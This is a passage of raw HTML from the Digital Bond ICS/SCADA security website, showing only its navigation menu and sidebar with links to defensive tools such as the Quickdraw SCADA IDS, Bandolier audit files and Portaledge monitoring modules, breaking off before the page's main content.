href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Left Sidebar -->
<td id="left">
<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul></div>
</td>
<!-- / Left Sidebar -->
<!-- Main Column -->
<td id="middle">
<div class="post-8880 page type-page status-publish hen..